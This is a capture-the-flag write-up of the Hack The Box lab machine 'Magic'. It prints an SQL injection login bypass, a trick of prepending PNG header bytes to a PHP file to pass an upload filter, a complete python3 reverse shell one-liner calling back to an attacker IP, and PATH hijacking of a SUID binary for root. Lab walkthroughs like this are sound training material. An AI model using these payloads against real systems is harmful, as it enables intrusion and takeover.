Magic was a medium difficulty machine on Hack the box. Here’s my take on solving the machine

TL;DR: Sql injection in login form allows authentication bypass and grants access to a image upload feature. The feature’s filter can by bypassed by sending a PHP file prepended with PNG format header, granting code execution and revese shell. Locally it’s possible to dump database using credentials found in PHP file. In the database there’s a password that allows to login as Theseus user and grab a user file. Privlege escalation is possible through a vulnerable SysInfo program. It calls fdisk with root rivleges. By manipulating PATH variable it’s possible to execute arbitrary code and gaining root privleges.s

User

Nmap show practically only one surface of attack, the webserver:

Main site contains a galery of some random images and a link to a login page:

The login page can be bypassed by using world’s oldest security injection in username field:

admin’ OR ‘a’=’a

It gives access to a file upload form:

The application filters uploaded images both by extension and content. The first filter can be bypassed by creating a file with a PHP reverse shell and a “double extension”, named for example tellico.php.png.

Above file will still be rejected because it’s content seems like a PNG. It can fixed by prepending PHP code with 6 bytes of PNG header:

0x89  0x50  0x4e  0x47  0x0d  0x0a  0x1a  0x0a

Now the file will upload but that’s not the end of the problems. Standard NetCat shell didn’t work (NetCat is missing from the box). So I uploaded a simple webshell to try and develop something that will work:

As it turns out there’s python interpreter installed, but it’s available under name python3. With that knowledge command:

python3 -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘10.10.14.38’,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/sh’,’-i’]);”

should return a shell:

In the var/www/Magic folder there’s a db.php5 file that contains database credentials:

$ cat db.php5
<?php
class Database
{
private static $dbName = ‘Magic’ ;
private static $dbHost = ‘localhost’ ;
private static $dbUsername = ‘theseus’;
private static $dbUserPassword = ‘iamkingtheseus’;
-- snip --

Using them it’s possible to dump the database and learn theseus password:

mysqldump -u theseus -p — all-databases
-- snip --
INSERT INTO `login` VALUES (1,’admin’,’Th3s3usW4sK1ng’);
-- snip --

This password fits also to theseus user in linux and gives access to the flag:

Root

There’s a suid sysinfo program installed on the machine. It is vulnerable to a known local privlege escalation. During the run it calls external fdisk program. By adding a writable directory to PATH, it’s possible to run arbitratry code with root privleges by creating a fake fdisk executable file. I used it to run my reverse shell code once again:

After running the sysinfo there should be a revshell returned with root privleges: